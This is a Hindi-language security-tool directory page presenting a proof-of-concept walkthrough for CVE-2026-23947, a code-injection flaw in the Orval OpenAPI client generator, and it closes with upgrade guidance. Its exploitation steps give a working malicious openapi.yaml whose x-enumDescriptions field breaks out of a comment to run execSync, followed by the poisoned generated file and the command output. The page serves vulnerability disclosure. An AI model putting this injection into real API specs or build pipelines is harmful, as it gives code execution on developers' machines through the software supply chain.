Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-23947-PoC — प्रमाण-अवधारणा जो दुर्भावनापूर्ण OpenAPI फ़ील्ड के माध्यम से Orval में मनमाना कोड निष्पादन प्रदर्शित करती है, जिसमें सेटअप, शोषण चरण और उपचार मार्गदर्शन शामिल है। | Kitploit
उपकरण/GitHubGitHub/boroeurnprach/cve-2026-23947-poc
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणआपूर्ति श्रृंखला सुरक्षा
GitHubboroeurnprach/cve-2026-23947-poc

CVE-2026-23947-PoC

प्रमाण-अवधारणा जो दुर्भावनापूर्ण OpenAPI फ़ील्ड के माध्यम से Orval में मनमाना कोड निष्पादन प्रदर्शित करती है, जिसमें सेटअप, शोषण चरण और उपचार मार्गदर्शन शामिल है।

रिपॉजिटरी देखें
77 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

वॉकथ्रू: CVE-2026-23947 - Orval मनमाना कोड निष्पादन

यह वॉकथ्रू दर्शाता है कि कैसे एक अविश्वसनीय OpenAPI स्पेसिफिकेशन x-enumDescriptions और x-enumNames फ़ील्ड्स के माध्यम से Orval का उपयोग करके जनरेट किए गए क्लाइंट्स में मनमाना कोड इंजेक्ट कर सकता है।

पूर्वापेक्षाएँ

  • Node.js (v20 या v22)
  • npm

सेटअप

  1. एक प्रोजेक्ट बनाएं और orval का एक कमजोर संस्करण इंस्टॉल करें (जैसे, 7.10.0):
root@kitploit:~
mkdir orval-poc
cd orval-poc
npm init -y
npm install [email protected] axios

  1. एक orval.config.js बनाएं:
root@kitploit:~
module.exports = {
  test: {
    input: './openapi.yaml',
    output: {
      target: './generated/api.ts',
      schemas: './generated/model',
      mode: 'split',
    },
  },
};

शोषण:

  1. निम्नलिखित सामग्री के साथ openapi.yaml बनाएं:
root@kitploit:~
openapi: 3.0.0
info:
  title: Test API
  version: 1.0.0
paths:
  /test:
    get:
      responses:
        '200':
          description: OK
          content:
            application/json:
              schema:
                type: object
                properties:
                  status:
                    $ref: '#/components/schemas/TestEnum'
components:
  schemas:
    TestEnum:
      type: string
      enum:
        - VAL1
      x-enumDescriptions:
        - "*/ }; (function(){ const { execSync } = require('child_process'); console.log('ID_COMMAND_OUTPUT: ' + execSync('id').toString()); })(); export const Dummy = { /*"
  1. क्लाइंट जनरेट करें:
root@kitploit:~
npx orval

  1. जनरेट किए गए generated/model/testEnum.ts का निरीक्षण करें:
root@kitploit:~
/**
 * Generated by orval v7.10.0 🍺
 * Do not edit manually.
 * Test API
 * OpenAPI spec version: 1.0.0
 */

export type TestEnum = typeof TestEnum[keyof typeof TestEnum];

// eslint-disable-next-line @typescript-eslint/no-redeclare
export const TestEnum = {
  /** */ }; (function(){ const { execSync } = require('child_process'); console.log('ID_COMMAND_OUTPUT: ' + execSync('id').toString()); })(); export const Dummy = { /* */
  VAL1: 'VAL1',
} as const;

सत्यापन

एक रनर स्क्रिप्ट exploit.ts बनाएं:

root@kitploit:~
import { TestEnum } from './generated/model/testEnum';
console.log('TestEnum value:', TestEnum);

इसे tsx का उपयोग करके चलाएं:

root@kitploit:~
npm install -D tsx
npx tsx exploit.ts

आउटपुट:

root@kitploit:~
🍻 Start orval v7.10.0 - A swagger client generator for typescript
🎉 test - Your OpenAPI spec has been converted into ready to use orval!
ID_COMMAND_OUTPUT: uid=1002(boroeurn) gid=1002(boroeurn) groups=1002(boroeurn),27(sudo),100(users),126(libvirt),986(docker),993(kvm)

TestEnum value: {}

उपचार

Orval को संस्करण 8.0.2 या उसके बाद के संस्करण में अपग्रेड करें। यह फिक्स js-string-escape का उपयोग करके इन स्ट्रिंग्स को ठीक से एस्केप करता है।

टूल डाउनलोड करें